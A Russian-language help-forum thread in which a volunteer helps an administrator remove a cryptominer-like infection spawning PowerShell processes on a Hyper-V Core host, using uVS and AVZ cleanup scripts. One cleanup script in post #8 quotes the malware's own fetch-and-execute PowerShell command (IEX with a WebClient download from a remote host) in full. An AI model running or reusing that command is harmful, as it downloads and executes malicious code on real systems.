Hyper-v core PowerShell грузит процессор+память

akok · Отправлено: **17:14, 03-11-2019** | #2

Доброго дня. Что за виртуалка и почему не удалось собрать логи? Откат точки не рассматриваете?

TimofeevAGVN53 · Отправлено: **22:50, 03-11-2019** | #3

Точнее это не виртуалка, а сам хост сервер - Hyper-v core.
Лог не удаётся собрать потому что пишет что подключен по РДП. Откат не рассматривал.

Sandor · Отправлено: **11:52, 04-11-2019** | #4

Цитата TimofeevAGVN53:

пишет что подключен по РДП »

Да, логи нужно снимать непосредственно на сервере, а не через терминальное подключение.
Кстати, пароли на RDP смените.

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".

Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

Код:

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
;---------command-block---------
deltsk %Sys32%\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
apply

В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Перезагрузите компьютер вручную.

Подробнее читайте в этом руководстве.

Проверьте уязвимые места:
Выполните скрипт в AVZ при наличии доступа в интернет:

Код:

var
LogPath : string;
ScriptPath : string;
begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';
  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else 
begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) 
else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить.
В первую очередь это относится к браузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.

Пройдитесь по ссылкам из файла avz_log.txt и установите все рекомендуемые обновления (если таковые будут).
Перезагрузите компьютер.
Снова выполните этот скрипт и убедитесь, что уязвимости устранены.

TimofeevAGVN53 · Отправлено: **09:44, 05-11-2019** | #5

Спасибо.
1) Почему нужно менять пароль RDP?
2) Когда первый скрипт выполнен он выдаст какое то сообщение?
3) Второй скрипт сообщил что ни каких уязвимостей нет.
4) Выполнил первый скрипт через некоторое время опять процессы powershell - скриншот во вложении

Sandor · Отправлено: **09:51, 05-11-2019** | #6

Цитата TimofeevAGVN53:

Почему нужно менять пароль RDP? »

Не исключено, что проникновение вредоноса происходит через взломанный пароль.

Цитата TimofeevAGVN53:

Когда первый скрипт выполнен он выдаст какое то сообщение? »

Нет.

Цитата TimofeevAGVN53:

через некоторое время опять процессы powershell »

Соберите свежий образ автозапуска uVS.

TimofeevAGVN53 · Отправлено: **10:09, 05-11-2019** | #7

Раньше CureIt видел вирусную задачу, сейчас не видит.
Лог во вложении.

Sandor · Отправлено: **10:41, 05-11-2019** | #8

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.
Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".

Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена:

Код:

;uVS v4.1.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
;---------command-block---------
delref IEX (NEW-OBJECT NET.WEBCLIENT).DOWNLOADSTRING('HTTP://DOWN.BDDP.NET/NEWOL.DAT?ALLV6&MAC=&AV=&VERSION=6.3.9600&BIT=64-BIT&FLAG2=TRUE&DOMAIN=HARD.NOV&USER=HPV9$&PS=TRUE')
delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\C94D3D10-F112B2E2-596AD9FA-E298B03A\150968B4D.SYS
delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\6267A36F-6CDFBD31-39CB72-2B244C2F\259D075B19.SYS
delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\AA44598C-D124EA12-25B37650-C44382F9\3B1A5F71A35.SYS
delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\E3B9B7B4-32056DB4-4A0C5244-4FB3A0DC\8ED1CEBB1B.SYS
delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\8EF1EB8017.SYS
delref %SystemDrive%\USERS\ITADMIN\APPDATA\LOCAL\TEMP\2\13ECE9FC-627FA9C8-8762782E-E41DE93C\C94D31C4.SYS
delref 752073A1-23F2-4396-85F0-8FDB879ED0ED\[CLSID]
apply

deltmp

В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена..."
Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Перегрузите компьютер вручную.

Подробнее читайте в этом руководстве.

Соберите еще раз образ автозапуска uVS (AutorunsVTChecker уже не нужно запускать).

TimofeevAGVN53 · Отправлено: **12:23, 05-11-2019** | #9

Спасибо.
Во вложении.

Sandor · Отправлено: **12:26, 05-11-2019** | #10

Лог выглядит хорошо. Проблема решена?